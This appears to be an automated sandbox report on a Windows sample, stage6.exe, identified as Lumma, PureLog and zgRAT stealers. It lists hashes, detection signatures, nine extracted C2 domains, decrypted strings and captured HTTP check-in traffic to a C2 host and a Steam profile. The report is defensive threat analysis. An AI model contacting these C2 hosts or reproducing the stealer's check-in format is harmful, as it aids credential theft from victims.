Edit tour

Windows Analysis Report
stage6.exe

Overview

General Information

Sample name:	stage6.exe
Analysis ID:	1675329
MD5:	03be1ee0944764446cd61be6ae8cc497
SHA1:	a8007574c5a81af39d193b19a29cc2fde8305f26
SHA256:	ca00dbff57cdc83f39a213ea96726063f18aa14f9a0ae2f52c2c6d54f23dcd00
Tags:	exeuser-zhuzhu0009
Infos:

Detection

LummaC, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Joe Sandbox ML detected suspicious sample

LummaC encrypted strings found

Sample uses string decryption to hide its real strings

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

stage6.exe (PID: 6272 cmdline: "C:\Users\user\Desktop\stage6.exe" MD5: 03BE1EE0944764446CD61BE6AE8CC497)

stage6.exe (PID: 6536 cmdline: "C:\Users\user\Desktop\stage6.exe" MD5: 03BE1EE0944764446CD61BE6AE8CC497)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.reveng.ai/one-clickfix-and-lummastealer-recaptchas-our-attention-part-1/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: LummaC

{
  "C2 url": [
    "crosshuaht.lat",
    "rapeflowwj.lat",
    "aspecteirs.lat",
    "surmisehotte.click",
    "discokeyus.lat",
    "energyaffai.lat",
    "sustainskelet.lat",
    "necklacebudi.lat",
    "grannyejh.lat"
  ],
  "Build id": "yJEcaG--singl6"
}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
stage6.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
stage6.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1157918429.0000000005E20000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000000.1135848711.0000000000E82000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1145306123.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: stage6.exe PID: 6272	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: stage6.exe PID: 6272	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.stage6.exe.5e20000.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.0.stage6.exe.e80000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.stage6.exe.e80000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-27T05:33:12.042328+0200	2028371	3	Unknown Traffic	192.168.2.4	49713	104.21.32.1	443	TCP
2025-04-27T05:33:33.426687+0200	2028371	3	Unknown Traffic	192.168.2.4	49722	23.52.218.12	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-27T05:33:31.658514+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49713	104.21.32.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-27T05:33:31.658514+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49713	104.21.32.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-27T05:33:32.325443+0200	2058354	1	Domain Observed Used for C2 Detected	192.168.2.4	57042	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-27T05:33:32.653417+0200	2058358	1	Domain Observed Used for C2 Detected	192.168.2.4	55368	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-27T05:33:31.839059+0200	2058360	1	Domain Observed Used for C2 Detected	192.168.2.4	53817	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-27T05:33:32.159469+0200	2058362	1	Domain Observed Used for C2 Detected	192.168.2.4	60567	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-27T05:33:31.666749+0200	2058364	1	Domain Observed Used for C2 Detected	192.168.2.4	62128	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-27T05:33:31.997019+0200	2058370	1	Domain Observed Used for C2 Detected	192.168.2.4	63267	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-27T05:33:32.822532+0200	2058374	1	Domain Observed Used for C2 Detected	192.168.2.4	58847	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-27T05:33:32.490041+0200	2058376	1	Domain Observed Used for C2 Detected	192.168.2.4	64227	1.1.1.1	53	UDP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-27T05:33:33.824801+0200	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	49722	23.52.218.12	443	TCP

Joe Sandbox Signatures

• AV Detection
• Compliance
• Software Vulnerabilities
• Networking
• Key, Mouse, Clipboard, Microphone and Screen Capturing
• System Summary
• Data Obfuscation
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection
• Stealing of Sensitive Information
• Remote Access Functionality

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: stage6.exe

Avira: detected

Antivirus detection for URL or domain

Source: crosshuaht.lat	Avira URL Cloud: Label: malware
Source: https://rapeflowwj.lat/	Avira URL Cloud: Label: malware
Source: energyaffai.lat	Avira URL Cloud: Label: malware
Source: sustainskelet.lat	Avira URL Cloud: Label: malware
Source: necklacebudi.lat	Avira URL Cloud: Label: malware
Source: rapeflowwj.lat	Avira URL Cloud: Label: malware
Source: https://necklacebudi.lat/api	Avira URL Cloud: Label: malware
Source: aspecteirs.lat	Avira URL Cloud: Label: malware
Source: grannyejh.lat	Avira URL Cloud: Label: malware
Source: discokeyus.lat	Avira URL Cloud: Label: malware

Found malware configuration

Source: 1.2.stage6.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["crosshuaht.lat", "rapeflowwj.lat", "aspecteirs.lat", "surmisehotte.click", "discokeyus.lat", "energyaffai.lat", "sustainskelet.lat", "necklacebudi.lat", "grannyejh.lat"], "Build id": "yJEcaG--singl6"}

Multi AV Scanner detection for submitted file

Source: stage6.exe	Virustotal: Detection: 59%			Perma Link
Source: stage6.exe	ReversingLabs: Detection: 63%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 95.3%

Sample uses string decryption to hide its real strings

Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rapeflowwj.lat
Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: crosshuaht.lat
Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: sustainskelet.lat
Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: aspecteirs.lat
Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: energyaffai.lat
Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: necklacebudi.lat
Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: discokeyus.lat
Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: grannyejh.lat
Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: surmisehotte.click
Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: yJEcaG--singl6

Source: stage6.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.52.218.12:443 -> 192.168.2.4:49722 version: TLS 1.2

Source: stage6.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: stage6.exe, 00000000.00000002.1158205855.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: stage6.exe, 00000000.00000002.1158205855.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]	1_2_0043C767
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then lea edx, dword ptr [ecx+01h]	1_2_0040B70C
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then jmp eax	1_2_0042984F
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]	1_2_00423860
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov edx, ecx	1_2_00438810
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh	1_2_00438810
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh	1_2_00438810
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then test eax, eax	1_2_00438810
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_0041682D
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]	1_2_0041682D
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]	1_2_0041682D
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov word ptr [ecx], bp	1_2_0041D83A
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then push C0BFD6CCh	1_2_00423086
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then push C0BFD6CCh	1_2_00423086
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	1_2_0042B170
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000080h]	1_2_004179C1
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h	1_2_0043B1D0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov ebx, eax	1_2_0043B1D0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov word ptr [ecx], dx	1_2_004291DD
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-20h]	1_2_004291DD
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov ebx, eax	1_2_00405990
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov ebp, eax	1_2_00405990
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov ebx, esi	1_2_00422190
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov word ptr [ebx], cx	1_2_00422190
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	1_2_00422190
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov byte ptr [edi], cl	1_2_0042CA49
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov byte ptr [esi], al	1_2_0042DA53
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]	1_2_00416263
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]	1_2_00415220
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then push esi	1_2_00427AD3
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov byte ptr [edi], cl	1_2_0042CAD0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov word ptr [ebx], ax	1_2_0041B2E0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then push ebx	1_2_0043CA93
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_0041CB40
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov word ptr [esi], cx	1_2_0041CB40
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_00428B61
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov byte ptr [edi], cl	1_2_0042CB11
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov byte ptr [edi], cl	1_2_0042CB22
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	1_2_0043F330
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov ebx, eax	1_2_0040DBD9
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov ebx, eax	1_2_0040DBD9
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]	1_2_00417380
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h	1_2_0041D380
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then cmp al, 2Eh	1_2_00426B95
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	1_2_00435450
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]	1_2_00417380
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then push 00000000h	1_2_00429C2B
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov word ptr [ecx], dx	1_2_004291DD
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-20h]	1_2_004291DD
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	1_2_004074F0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	1_2_004074F0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	1_2_0043ECA0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h	1_2_004385E0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then jmp eax	1_2_004385E0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]	1_2_00417DEE
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov ecx, eax	1_2_00409580
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov word ptr [ebp+00h], ax	1_2_00409580
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then jmp dword ptr [0044450Ch]	1_2_00418591
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov eax, dword ptr [ebp-68h]	1_2_00428D93
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then xor edi, edi	1_2_0041759F
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov eax, dword ptr [0044473Ch]	1_2_0041C653
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov edx, ebp	1_2_00425E70
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then jmp dword ptr [004455F4h]	1_2_00425E30
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov ecx, eax	1_2_0043AEC0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then xor byte ptr [esp+eax+17h], al	1_2_00408F50
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov byte ptr [edi], bl	1_2_00408F50
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	1_2_0042A700
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov byte ptr [esi], al	1_2_0041BF14
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h]	1_2_00419F30
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]	1_2_0041E7C0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then movzx eax, word ptr [edx]	1_2_004197C2
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov word ptr [edi], dx	1_2_004197C2
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov word ptr [esi], cx	1_2_004197C2
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov ecx, ebx	1_2_0042DFE9
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then jmp ecx	1_2_0040BFFD
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov esi, eax	1_2_00415799
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then mov ecx, eax	1_2_00415799
Source: C:\Users\user\Desktop\stage6.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	1_2_0043EFB0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.4:57042 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.4:64227 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.4:55368 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.4:62128 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.4:53817 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.4:63267 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.4:60567 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.4:58847 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49722 -> 23.52.218.12:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49713 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49713 -> 104.21.32.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: crosshuaht.lat
Source: Malware configuration extractor	URLs: rapeflowwj.lat
Source: Malware configuration extractor	URLs: aspecteirs.lat
Source: Malware configuration extractor	URLs: surmisehotte.click
Source: Malware configuration extractor	URLs: discokeyus.lat
Source: Malware configuration extractor	URLs: energyaffai.lat
Source: Malware configuration extractor	URLs: sustainskelet.lat
Source: Malware configuration extractor	URLs: necklacebudi.lat
Source: Malware configuration extractor	URLs: grannyejh.lat

Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 23.52.218.12 23.52.218.12

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49713 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49722 -> 23.52.218.12:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: surmisehotte.click
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: global traffic	DNS traffic detected: DNS query: surmisehotte.click
Source: global traffic	DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic	DNS traffic detected: DNS query: discokeyus.lat
Source: global traffic	DNS traffic detected: DNS query: necklacebudi.lat
Source: global traffic	DNS traffic detected: DNS query: energyaffai.lat
Source: global traffic	DNS traffic detected: DNS query: aspecteirs.lat
Source: global traffic	DNS traffic detected: DNS query: sustainskelet.lat
Source: global traffic	DNS traffic detected: DNS query: crosshuaht.lat
Source: global traffic	DNS traffic detected: DNS query: rapeflowwj.lat
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: surmisehotte.click

